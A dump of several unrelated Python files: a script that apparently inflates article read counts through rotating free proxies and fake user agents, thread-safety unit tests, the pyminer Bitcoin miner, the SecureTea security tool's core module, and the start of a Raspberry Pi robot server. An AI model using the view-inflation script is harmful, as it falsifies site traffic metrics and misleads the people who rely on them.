rc.expire(article_set_key, 4*60*60) # 1 hour expire
return article_info_list
def get_read_count(text):
html = etree.HTML(text, etree.HTMLParser())
try:
read_count = html.xpath('//span[@class="read-count"]')[0].text
except:
read_count = '-'
return read_count
def read_article(article, proxy_or_agent=None):
url = article['href']
title = article['title']
if proxy_or_agent == 'free':
proxy = make_proxy_from_free()
headers = get_user_agent()
elif proxy_or_agent == 'xdali':
proxy_dict = make_proxy_from_xdali()
proxy = proxy_dict['proxy']
headers = proxy_dict['headers']
elif proxy_or_agent is None:
print(f'{title}, no proxy or agent, return back...')
return
else:
proxy = proxy_or_agent
headers = get_user_agent()
try:
r = requests.get(url, headers=headers, proxies=proxy, verify=False, allow_redirects=False, timeout=10)
except:
print(f'\t\t title: {title}, proxy access failed...')
return
else:
r.encoding = 'utf8'
if r.status_code == 200:
read_num = get_read_count(r.text)
print(f'title: {title}, access ok, read_num: {int(read_num)+1}')
return
if r.status_code == 302 or r.status_code == 301:
loc = r.headers['Location']
r = requests.get(loc, headers=headers, proxies=proxy, verify=False, allow_redirects=False)
r.encoding = 'utf8'
if r.status_code != 200:
print(f'\t\t title: {title}, proxy access failed...')
return
else:
read_num = get_read_count(r.text)
print(f'title: {title}, read_num: {read_num}')
def access_all_articles():
articles_info_list = get_articles_info()
while True:
t0 = time.time()
t_list = []
# proxy = make_proxy_from_free()
# print(proxy)
for articles_info in articles_info_list:
t = Thread(target=read_article, args=[articles_info, 'free'])
t.start()
t_list.append(t)
[t.join() for t in t_list]
t1 = time.time() - t0
print(f'---------------- seconds: {t1} ---------------\n')
time.sleep(3)
def mutil():
for i in range(8):
p = Process(target=access_all_articles)
p.start()
if __name__ == '__main__':
# mutil()
# x = make_proxy_from_free()
# print(x)
access_all_articles()
|
test_collection.py
|
"""
Legalese
--------
Copyright (c) 2016 Genome Research Ltd.
Author: Colin Nolan <cn13@sanger.ac.uk>
This file is part of HGI's common Python library
This program is free software: you can redistribute it and/or modify it
under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 3 of the License, or (at
your option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser
General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import copy
import unittest
from collections import defaultdict
from threading import Semaphore
from threading import Thread
from time import sleep
from hgicommon.collections import Metadata, ThreadSafeDefaultdict
class TestThreadSafeDefaultdict(unittest.TestCase):
"""
Tests for `ThreadSafeDefaultdict`.
"""
def test_is_defaultdict(self):
self.assertIsInstance(ThreadSafeDefaultdict(), defaultdict)
def test_getitem_can_be_used_to_get_valeus(self):
thread_safe_dict = ThreadSafeDefaultdict(object)
item_at_zero = thread_safe_dict[0]
self.assertEqual(thread_safe_dict[1], thread_safe_dict[1])
self.assertNotEqual(thread_safe_dict[2], thread_safe_dict[3])
self.assertEqual(item_at_zero, thread_safe_dict[0])
def test_getitem_is_threadsafe(self):
# `defaultdict` will fail this test!
number_of_threads = 100
values = []
def object_factory() -> object:
# This sleep triggers a context switch if there are other threads running
sleep(0.1)
created = object()
values.append(created)
return created
thread_safe_dict = ThreadSafeDefaultdict(object_factory)
values_of_foo = []
wait_semaphore = Semaphore(0)
def get_and_store_foo_value():
values_of_foo.append(thread_safe_dict["foo"])
wait_semaphore.release()
for _ in range(number_of_threads):
Thread(target=get_and_store_foo_value).start()
for _ in range(number_of_threads):
wait_semaphore.acquire()
assert len(values_of_foo) == number_of_threads
for i in range(number_of_threads - 1):
self.assertEqual(values_of_foo[i], values_of_foo[i + 1])
class TestMetadata(unittest.TestCase):
"""
Tests for `Metadata`.
"""
_TEST_VALUES = {1: 2, 3: 4}
def setUp(self):
self.metadata = Metadata(TestMetadata._TEST_VALUES)
def test_init_with_no_values(self):
self.assertEqual(len(Metadata()), 0)
def test_init_with_values(self):
self.assertCountEqual(self.metadata.keys(), TestMetadata._TEST_VALUES.keys())
self.assertCountEqual(self.metadata.values(), TestMetadata._TEST_VALUES.values())
def test_get(self):
self.assertEqual(self.metadata.get(1), TestMetadata._TEST_VALUES[1])
self.assertEqual(self.metadata[1], TestMetadata._TEST_VALUES[1])
def test_rename(self):
self.metadata.rename(1, 10)
self.assertNotIn(1, self.metadata)
self.assertEqual(self.metadata[10], 2)
def test_rename_non_existent(self):
self.assertRaises(KeyError, self.metadata.rename, 10, 20)
def test_rename_to_same_name(self):
self.metadata.rename(1, 1)
self.assertEqual(self.metadata[1], 2)
def test_pop(self):
self.metadata.pop(1)
self.assertEqual(self.metadata, Metadata({3: 4}))
def test_clear(self):
self.metadata.clear()
self.assertEqual(self.metadata, Metadata())
def test_delete(self):
del self.metadata[1]
self.assertEqual(self.metadata, Metadata({3: 4}))
def test_len(self):
self.assertEqual(len(self.metadata), 2)
def test_items(self):
self.assertCountEqual(self.metadata.items(), [(1, 2), (3, 4)])
def test_values(self):
self.assertCountEqual(self.metadata.values(), [2, 4])
def test_keys(self):
self.assertCountEqual(self.metadata.keys(), [1, 3])
def test_eq_when_equal(self):
self.assertEqual(Metadata(TestMetadata._TEST_VALUES), Metadata(TestMetadata._TEST_VALUES))
def test_eq_when_not_eqal(self):
self.assertNotEqual(Metadata(TestMetadata._TEST_VALUES), Metadata())
def test_repr(self):
string_representation = repr(self.metadata)
self.assertTrue(isinstance(string_representation, str))
def test_contains(self):
self.assertIn(1, self.metadata)
self.assertNotIn("a", self.metadata)
def test_copy(self):
self.assertEqual(copy.copy(self.metadata), self.metadata)
def test_deepcopy(self):
self.assertEqual(copy.deepcopy(self.metadata), self.metadata)
if __name__ == "__main__":
unittest.main()
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file license.txt or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 8332
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
deferred.py
|
import os
import time
import threading
def run(delaySeconds:float, func, *args, **kwargs):
assert isinstance(delaySeconds, (int,float))
assert callable(func)
def _threadFunc():
time.sleep(delaySeconds)
func(*args, **kwargs)
#
t = threading.Thread(target=_threadFunc)
t.start()
#
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
# from securetea.lib.notifs import secureTeaMalwareAnalysis
from securetea.lib.malware_analysis.malware_analysis_runner import SecureTeaMalwareAnalysis
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaWhatsapp
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.waf.Server import SecureTeaWaf
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.lib.social_engineering.socialEngineering import SecureTeaSocialEngineering
from securetea.lib.history_logger.secureTeaHistoryLogger import SecureTeaHistoryLogger
from securetea.lib.history_logger.historylogger_logger import HistoryLogger
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
Collects the arguments passed and calls the respected module accordingly
for parsing the arguments. Further, creates object for the demanded
notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
try:
args_dict = argsHelper.check_args()
except KeyboardInterrupt:
print('\nKeyboard Interrupt detected. \nQuitting....')
exit(0)
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.history_logger = self.cred['history_logger']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.malware_analysis_provided = args_dict['malware_analysis']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.whatsapp_provided = args_dict['whatsapp_provided']
self.social_eng_provided = args_dict['social_eng_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.waf_provided=args_dict["waf_provided"]
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided and not self.cred['skip_config_file']:
credentials.save_creds(self.cred)
elif not self.cred['skip_config_file']:
self.cred = credentials.get_creds(args)
try:
if self.cred['social_eng']:
self.social_eng_provided = True
except KeyError:
self.logger.log(
"Social Engineering configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['malware_analysis']:
self.malware_analysis_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Malware analysis configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['whatsapp']:
self.whatsapp_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Whatsapp configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided and not (self.cred['history_logger'] or self.cred['clamav'] or self.cred['yara']):
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Welcome to SecureTea..!! Initializing System",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
# Avoid multiple process of the objects created by the server mode, set their credentials to False
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.waf_provided=False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
# Avoid multiple process of the objects created by the system mode, set their credentials to False
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
self.ids_provided = False
# Check for Social Engineering
if self.social_eng_provided:
self.logger.log(
"Starting SecureTea Social Engineering",
logtype="info"
)
self.social_eng_obj = SecureTeaSocialEngineering(debug=self.cred["debug"], email_id=self.cred["social_eng"]["email"])
self.social_eng_obj.start()
# Check for History Logger
if self.history_logger:
self.logger.log(
"Starting SecureTea History Logger",
logtype="info"
)
self.history_logger_obj = SecureTeaHistoryLogger(debug=self.cred["debug"])
self.history_logger_obj.start()
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
# Avoid multiple process of the objects created by the IoT mode, set their credentials to False
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.malware_analysis_provided:
self.malware_analysis_obj = SecureTeaMalwareAnalysis(self.cred['malware_analysis'])
self.malware_analysis_obj.runner()
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Welcome to SecureTea..!! Initializing System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.whatsapp_provided:
self.whatsapp = secureTeaWhatsapp.SecureTeaWhatsapp(
self.cred['whatsapp'],
self.cred['debug']
)
if not self.whatsapp.enabled:
self.logger.log(
"Whatsapp not configured properly.",
logtype="error"
)
else:
self.whatsapp.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
if self.cred['ids']:
ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.cred['debug'])
ids_obj.start_ids()
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
if self.waf_provided:
try:
if self.cred['waf']:
waf_obj=SecureTeaWaf.SecureTeaWaf(cred=self.cred['waf'],debug=self.cred["debug"])
waf_obj.startWaf()
except KeyError:
self.logger.log(
"WAF parameter not configured ",
logtype="error"
)
if self.system_log_provided:
try:
sys_obj = engine.SystemLogEngine(debug=self.cred['debug'])
sys_obj.run()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.server_log_provided:
server_cred = self.cred['server_log']
try:
server_obj = SecureTeaServerLog(debug=self.cred['debug'],
log_type=server_cred['log-type'],
log_file=server_cred['log-file'],
window=server_cred['window'],
ip_list=server_cred['ip-list'],
status_code=server_cred['status-code'])
server_obj.run()
except KeyError:
self.logger.log(
"Server Log parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.auto_server_patcher_provided:
auto_server_patcher_cred = self.cred['auto_server_patcher']
try:
patcher_obj = SecureTeaAutoServerPatcher(debug=self.cred['debug'],
cred=auto_server_patcher_cred)
patcher_obj.start()
except KeyError:
self.logger.log(
"Auto Server Patcher parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.web_deface_provided:
web_deface = self.cred['web_deface']
try:
web_deface_obj = WebDeface(debug=self.cred['debug'],
path=web_deface['path'],
server_name=web_deface['server-name'])
web_deface_obj.start()
except KeyError:
self.logger.log(
"Web Deface Detection parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.antivirus_provided or self.cred['clamav'] or self.cred['yara']:
if self.cred.get('antivirus',0):
antivirus = self.cred['antivirus']
else:
antivirus = {}
antivirus['update'] = False
antivirus['custom-scan'] = False
antivirus['auto-delete'] = False
antivirus['monitor-usb'] = False
antivirus['monitor-file-changes'] = False
antivirus['virustotal-api-key'] = ''
try:
antivirus_obj = SecureTeaAntiVirus(debug=self.cred['debug'], cred=antivirus, use_clamav=self.cred['clamav'], use_yara=self.cred['yara'])
antivirus_obj.start()
except KeyError:
self.logger.log(
"AntiVirus parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.iot_checker_provided:
try:
iot_checker_obj = iot_checker.IoTChecker(debug=self.cred['debug'],
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
iot_checker_obj.check_shodan_range()
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def send_notif(self, msg):
"""Send notification through
the available mediums.
Args:
msg (str): Message to send
Raises:
None
Returns:
None
"""
# Send a warning message via twitter account
if self.twitter_provided:
self.twitter.notify(msg)
# Send a warning message via telegram bot
if self.telegram_provided:
self.telegram.notify(msg)
# Send a warning message via twilio account
if self.twilio_provided:
self.twilio.notify(msg)
# Send a warning message via whatsapp account
if self.whatsapp_provided:
self.whatsapp.notify(msg)
# Send a warning message via slack bot app
if self.slack_provided:
self.slack.notify(msg)
# Send a warning message via aws ses bot3 app
if self.aws_ses_provided:
self.aws_ses.notify(msg)
# Send a warning message via Gmail
if self.gmail_provided:
self.gmail_obj.notify(msg)
def on_move(self, x, y):
"""
Log warning on terminal & send notification
on mouse movement.
Args:
x (TYPE): X - mouse position
y (TYPE): y - mouse position
Raises:
None
Returns:
bool (False): Stop the listener
"""
self.logger.log('Pointer moved to {0}'.format((x, y)))
msg = '(' + str(self.alert_count) + \
') : Someone has accessed your computer'
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
# Update counter for the next move
self.alert_count += 1
self.logger.log("The program will sleep for 10 seconds")
time.sleep(10)
# Ready to monitor the next move
self.logger.log("Ready to monitor further movement .. !!")
# Stop the listener
return False
@staticmethod
def get_mouse_event():
"""Get mouse event.
Args:
None
Raises:
None
Returns:
x (int): X - mouse position
y (int): y - mouse position
"""
with open("/dev/input/mice", "rb") as fh:
buf = fh.read(3)
x, y = struct.unpack("bb", buf[1:])
return x, y
def get_by_mice(self):
"""Detect intrusion by watching mouse coordinates.
Args:
None
Raises:
None
Returns:
None
"""
posx = 0
posy = 0
while(1):
x, y = self.get_mouse_event()
posx = posx + x
posy = posy + y
if (posx > 100 or posy > 100 or posx < -100 or posy < -100):
posx = 0
posy = 0
self.on_move(posx, posy)
def on_user_update(self):
"""
Send updates regarding the users currently logged in to the system
to various platforms.
"""
msg = self.userLogger.log()
if msg == "USERS UPDATES\n":
self.logger.log("NO NEW USERS DETECTED")
return
# Shows the warning msg on the console
self.logger.log(msg, logtype="warning")
# Send message notification to available platforms
self.send_notif(msg)
return
def run_mouse_notifs(self):
"""Run methods for notification using mice activity"""
time.sleep(10)
try:
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting mouse event listner
with mouse.Listener(on_move=self.on_move) as listener:
listener.join()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run_user_notifs(self):
"""Run methods for notification of users added or removed"""
try:
from securetea import users
self.userLogger = users.SecureTeaUserLogger(self.cred['debug'])
if not pynput_status:
self.get_by_mice()
else:
while 1:
# Starting user notifs
self.on_user_update()
time.sleep(10)
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
def run(self):
"""
Track mouse activity & SSH users on
different threads.
Args:
None
Raises:
None
Returns:
None
"""
try:
t1 = threading.Thread(target=self.run_mouse_notifs)
t2 = threading.Thread(target=self.run_user_notifs)
t2.start()
t1.start()
except Exception as e:
self.logger.log(
"Something went wrong: " + str(e) + " End of program",
logtype="error"
)
except KeyboardInterrupt as e:
self.logger.log(
"You pressed Ctrl+C!, Bye")
exit()
|
server-tad-pi-v3.py
|
#!/usr/bin/python
from Adafruit_PWM_Servo_Driver import PWM
import socket
from multiprocessing import Process, Manager
import time
import sys
import RPi.GPIO as GPIO
import os
'''
!!!THIS IS FOR LOCALHOST TESTING!!!
Writen by Gunnar Bjorkman to control a robot via raspberrypi
Current design:
* Uses PWM Pi Hat (from adafruit) to control many motors and servos
* Recieve client's inputs and send server/robot info to client over socket
connection.
* Controls ESCs and servos that are plugged into the GPIO ports on the
raspberrypi.
* Uses TCP bi-directional connection (both server and client can send and
recieve data).
* Multiprocessing so the server can listen for messages and control the
robot simultaneously.
Copy file over ssh to raspberrypi:
